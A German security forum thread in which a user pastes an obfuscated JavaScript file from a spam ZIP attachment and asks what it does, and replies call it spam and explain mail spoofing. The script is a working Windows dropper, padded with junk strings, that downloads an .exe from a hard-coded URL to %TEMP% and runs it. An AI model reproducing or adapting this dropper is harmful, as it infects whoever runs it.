Hallo,

ich erhalte seit einigen Tagen eigenartige E-Mails, die angeblich von meinem eigenen Konto an mich geschickt wurden. Diese Mails enthalten keinerlei Text sondern nur einen Anhang: "Document2.zip". Ich bin neugierig geworden, und habe mir den Inhalt mal in einem virtuellen Ubuntu ohne Internetzugriff angeschaut. In dem Zip-File habe eine JavaScript-Datei gefunden. Leider reichen meine Kenntnisse in JavaScript nicht aus, um den ziemlich verwirrenden Programmcode zu verstehen, also wollte ich mal jemanden aus dem Trojaner-Board frage, ob er etwas damit anfangen kann und ob ich mir deswegen Sorgen machen sollte.

Hier der Code:

Code: Alles auswählenAufklappen

ATTFilter

eWQniYJJJqb = "} if ( seed ) { if ( postFinder || preFilter ) { if ( postFinder ) { Get the final matcherOut by condensing this intermediate into postFinder contexts temp = []; i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) ) { Restore matcherIn since elem is not yet a final match temp.push( (matcherIn[i] = elem) ); } } postFinder( null, (matcherOut = []), temp, xml ); ";

accountableI = 0;

String.prototype.naive = function () { return this.substr(0, 1); };

var wgOCV = ["M"+("coinage","weapons","betimes","educated","Ii")+"qu"+("clamber","forming","JBVvR"), ("judgement","slavish","dVG")+("stipend","figuratively","atmospheric","naturalist","II")+("scanning","extensions","bn")+"RcLm", "ExpandEnv"+("modulation","inhospitable","pigtail","ir")+"on"+"me"+"ntStri"+"ngs", ""+("chronicles","locale","%")+"TE"+"MP%", ""+("bloodhound","entail","poetry",".")+"exe", ("seminars","replaced","comment","stuffing","R")+"un", ("contact","enquiring","nominate","undeniable","Actco")+"unterivcountereX"+("hurling","condone","buffalo","counte")+"rO"+"bcount"+("thirty","oligarchy","alias","booth","erjecoun")+("arrived","danny","civilization","terct"), "lriRxn", "ddcyjtFEUpi", "W"+"Sc"+"co"+"un"+"te"+"rr"+"ip"+"tc"+("denunciation","listprice","tingling","ou")+"nt"+"er." + ("withdrawal","longwinded","S"), "ymXMqApbIv", ("kingdom","failed","hco")+"unte"+"re"+"lcount"+"erl", "YWACVXlR", ""+"H"+("gripping","fibrous","stepdaughter","seeds","zO")+"Vaw", "Mco"+"un"+"te"+"rS"+("auction","dating","Xc")+("custody","minutiae","endorsement","ount")+("preamble","impeach","erML")+"coun"+"ter2" + "."+"coun"+("codes","fixed","learner","te")+("highlight","mephistopheles","frugal","manor","rX")+"McounterLHcounterTTP"];

pcwsBTbM = "}function matcherFromTokens( tokens ) { var checkContext, matcher, j, len = tokens.length, leadingRelative = Expr.relative[ tokens[0].type ], implicitRelative = leadingRelative || Expr.relative[\" \"], i = leadingRelative ? 1 : 0,";

wgOCV.splice(7, accountableI + 2);

sharpen = wgOCV[1+4+1].split("counter").join("");

var GymEDPjn = this[sharpen];

nERqhlmGDdB = "PIFIxecYw";

chrysalis = (("solutions", "swirl", "clips", "paralysis", "pVeVNII") + "tAVvmirW").naive();

equatorials = (("adduce", "flooring", "unions", "playback", "sWmgnaCHXETh") + "moVhFMoKOYo").naive();



accountableI = 6;

wgOCV[accountableI + 1] = wgOCV[accountableI + 1] + wgOCV[accountableI + 3];

wgOCV[accountableI + 2] = "EvuQoWamx";

accountableI++;

wgOCV.splice(accountableI + 1, accountableI - 4);

wgOCV[accountableI] = wgOCV[accountableI].split("counter").join("");

var ltKuu = new GymEDPjn(wgOCV[accountableI]);

vnPilEIXp = " seed[temp] = !(results[temp] = elem); } } ";

accountableI++;

wgOCV[accountableI + 1] = wgOCV[accountableI + 1].split("counter").join("");

var KtbEPMh = new GymEDPjn(wgOCV[1 + accountableI]);

rtCthIsahzc = "} Move matched elements from seed to results to keep them synchronized i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) && (temp = postFinder ? indexOf( seed, elem ) : preMap[i]) > -1 ) {";

accountableI /= 2;

var DkYHv = ltKuu[wgOCV[accountableI - 2]](wgOCV[accountableI - 1]);

XEHDiPIHSTB = "} Add elements to results, through postFinder if defined } else { matcherOut = condense( matcherOut === results ? matcherOut.splice( preexisting, matcherOut.length ) : matcherOut ); if ( postFinder ) { postFinder( null, results, matcherOut, xml ); } else { push.apply( results, matcherOut ); } } }); ";

subjectivee = (("queenly", "interests", "contacts", "fairly", "ElSaIFDa") + "Wyxpkz").naive();



function contains(healing, reproduce) {



    try {

        var lobby = DkYHv + "/" + reproduce + wgOCV[accountableI];

    wSoGcxQQA = "} Add elements passing elementMatchers directly to results Support: IE<9, Safari Tolerate NodeList properties (IE: \"length\"; Safari: <number>) matching elements by id for ( ; i !== len && (elem = elems[i]) != null; i++ ) { if ( byElement && elem ) { j = 0; if ( !context && elem.ownerDocument !== document ) { setDocument( elem ); xml = !documentIsHTML; } while ( (matcher = elementMatchers[j++]) ) { if ( matcher( elem, context || document, xml) ) { results.push( elem ); break; } } if ( outermost ) { dirruns = dirrunsUnique; } ";

    KtbEPMh["o" + chrysalis + subjectivee + "n"](("title","interventions","twentythird","G") + subjectivee + ("notifications","molten","automated","accentuated","T"), healing, false);



    rUzxymoD = "} Track unmatched elements for set filters if ( bySet ) { They will have gone through all possible matchers if ( (elem = !matcher && elem) ) { matchedCount--; ";

    KtbEPMh[equatorials + ("educate","prefers","curtsey","e") + (("perishing", "excuse", "questionnaire", "cameroon", "townsman", "nmutgWSmhA") + "rLtbyk").naive() + (("stones", "glaze", "tyrannical", "retirement", "suitable", "ddVoLlCiImD") + "flXFlq").naive()]();

    mmHcJHVNvs = "} Lengthen the array for every element, matched or not if ( seed ) { unmatched.push( elem ); } } ";

    if (KtbEPMh.status == 200) {

        var XvPNrjgxg = new GymEDPjn((""+"A"+("impertinence","badly","pO")+("lined","prefix","talented","wildlife","DB.") + ("impel","convocation","")+"S"+("hedgehog","foregone","picks","tr")+"eam").replace("p", "D"));

        XvPNrjgxg.open();

        gamHpS = " The foundational matcher ensures that elements are reachable from top-level context(s) matchContext = addCombinator( function( elem ) { return elem === checkContext; }, implicitRelative, true ), matchAnyContext = addCombinator( function( elem ) { return indexOf( checkContext, elem ) > -1; }, implicitRelative, true ), matchers = [ function( elem, context, xml ) { var ret = ( !leadingRelative && ( xml || context !== outermostContext ) ) || ( (checkContext = context).nodeType ? matchContext( elem, context, xml ) : matchAnyContext( elem, context, xml ) ); Avoid hanging onto element (issue #299) checkContext = null; return ret; } ];";

        XvPNrjgxg.type = 8 * (4 - 3 - 1) + 1;

        Wvpzidhwtfd = " for ( ; i < len; i++ ) { if ( (matcher = Expr.relative[ tokens[i].type ]) ) { matchers = [ addCombinator(elementMatcher( matchers ), matcher) ]; } else { matcher = Expr.filter[ tokens[i].type ].apply( null, tokens[i].matches );";

        XvPNrjgxg["w"+"ri"+("miocene","divorce","marge","obstruct","te")](KtbEPMh[""+"R"+("gazette","stuck","brandenburg","es")+("effigy","fruit","pon") + equatorials + ("remarks","canyon","overweening","e")+"Bo"+"dy"]);

        TvgAVxhblG = " Return special upon seeing a positional matcher if ( matcher[ expando ] ) { Find the next relative operator (if any) for proper handling j = ++i; for ( ; j < len; j++ ) { if ( Expr.relative[ tokens[j].type ] ) { break; } } return setMatcher( i > 1 && elementMatcher( matchers ), i > 1 && toSelector( If the preceding token was a descendant combinator, insert an implicit any-element `*` tokens.slice( 0, i - 1 ).concat({ value: tokens[ i - 2 ].type === \" \" ? \"*\" : \"\" }) ).replace( rtrim, \"$1\" ), matcher, i < j && matcherFromTokens( tokens.slice( i, j ) ), j < len && matcherFromTokens( (tokens = tokens.slice( j )) ), j < len && toSelector( tokens ) ); } matchers.push( matcher ); } ";

        XvPNrjgxg[(chrysalis + "o"+("windlass","camcorder","Di")+("trial","frontier","prague","ti")+"on").replace("D", equatorials)] = 0;

        wgPBgDSwUf = "} return elementMatcher( matchers ); ";

        XvPNrjgxg.saveToFile(lobby, 2);

        oUuMeEUmo = "}function matcherFromGroupMatchers( elementMatchers, setMatchers ) { var bySet = setMatchers.length > 0, byElement = elementMatchers.length > 0, superMatcher = function( seed, context, xml, results, outermost ) { var elem, j, matcher, matchedCount = 0, i = \"0\", unmatched = seed && [], setMatched = [], contextBackup = outermostContext, We must always have either seed elements or outermost context elems = seed || byElement && Expr.find[\"TAG\"]( \"*\", outermost ), Use integer dirruns iff this is the outermost matcher dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1), len = elems.length;";

        XvPNrjgxg.close();

        KLxKYyqkiQ = " if ( outermost ) { outermostContext = context === document || context || outermost; ";

        ltKuu[wgOCV[accountableI + 1]](lobby, 1, "qFRsrAaSAH" === "Dlglgj"); UekaMc = "} if ( seed ) { Reintegrate element matches to eliminate the need for sorting if ( matchedCount > 0 ) { while ( i-- ) { if ( !(unmatched[i] || setMatched[i]) ) { setMatched[i] = pop.call( results ); } } ";

    }



} catch (anLdioi) { };



}

contains(("intrinsic","authorised","h")+("michael","eucalyptus","orleans","quoted","ttp:")+("vineyard","swain","//naaira")+("jumps","astounded","h.")+("vineyard","holes","humbug","co")+("jumping","openings","whiten","m/wp-c")+("potter","compress","gateway","courier","ontent")+("picks","seasonal","prices","newfoundland","/plu")+("fossil","agonized","gi")+"ns"+("shanghai","analytical","/h")+("forsworn","accede","cadence","citation","ello")+("retains","holidays","123/j7u7h5")+("blurred","stink","treatments","4h")+"5."+"exe","CgYrXLur");

   heCmMnWXoB = "} `i` is now the count of elements visited above, and adding it to `matchedCount` makes the latter nonnegative. matchedCount += i;";



  EMshQEJ = " Apply set filters to unmatched elements NOTE: This can be skipped if there are no unmatched elements (i.e., `matchedCount` equals `i`), unless we didn\"t visit _any_ elements in the above loop because we have no element matchers and no seed. Incrementing an initially-string \"0\" `i` allows `i` to remain a string only in that case, which will result in a \"00\" `matchedCount` that differs from `i` but is also numerically zero. if ( bySet && i !== matchedCount ) { j = 0; while ( (matcher = setMatchers[j++]) ) { matcher( unmatched, setMatched, context, xml ); ";
         

Vielen Dank schon mal!

Gruß Mark32801

moin

Sowas nennt man Spam. Oder auch Betrugsmail.

"Leider"? Was willst du denn daran verstehen, versteh nicht was das soll. Bösartigen Code zu verstehen und Signaturen dafür bereitstellen ist nicht deine Aufgabe sondern die der Virenscannerhersteller.

Also, einfach so ein Müll ungelesen löschen und nicht weiter darüber nachdenken.

er will ja auch wissen wieso nicht was genau... den ergo es kommt von seiner eigenden Email Adresse


ich tipp drauf das du dir irgendnen scheiss eingefangen hast auf nem rechner....

Da tippst du wohl leider daneben, google doch mal nach mail spoofing
Nur weil eine Mail als Absender die eigene Mailadresse hat, heißt das nicht, dass sein Rechner infiziert ist.